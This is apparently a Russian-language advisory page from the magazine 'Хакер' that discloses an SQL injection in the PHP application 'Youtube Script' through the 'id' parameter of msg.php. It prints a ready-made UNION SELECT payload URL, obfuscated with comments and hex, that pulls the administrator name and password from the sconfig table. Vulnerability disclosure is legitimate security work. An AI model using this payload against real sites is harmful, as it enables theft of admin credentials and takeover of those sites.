Продукты «Хакера»

  • Ежеквартальный «Хакер» #3

    Лучшие статьи квартала на бумаге

    2 000 ₽

    Заказать журнал
  • Годовая подписка на Xakep.ru

    Полный доступ к статьям и архиву выпусков

    6 000 ₽ в год

    Подписаться
  • «Пентест WEB» для начинающих

    Совместный курс «Хакера» и лаборатории «Хаксет»

    7 000 ₽

    Купить курс
  • Спецвыпуск «Хакера» #4

    Лучшие статьи за 2021–2022 годы на бумаге

    2 000 ₽

    Заказать журнал

Программа: Youtube Script

Уязвимость в Youtube Script позволяет удаленному нападающему выполнить произвольные SQL-команды в базе данных приложения. Параметр "id", передающийся к файлу msg.php не проверяется на наличие команд, в результате взломщик может выполнить произвольный SQL-код.

Пример:

http://site.com/path/msg.php?id=-1/**/UNION/**/ALL/* */SELECT/**/1,0x7430705038755A7A20616E64207870726F67206F776E616765, convert(concat((SELECT/**/svalue/**/from/**/sconfig/* */where/**/soption= 0x61646D696E5F6E616D65),0x3a,(SELECT/**/svalue/* */from/**/sconfig/**/where/**/soption= 0x61646D696E5F70617373))/**/using/**/latin1), 4,5,6,7,8,9/*

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Старые
    Новые Популярные
    Межтекстовые Отзывы
    Посмотреть все комментарии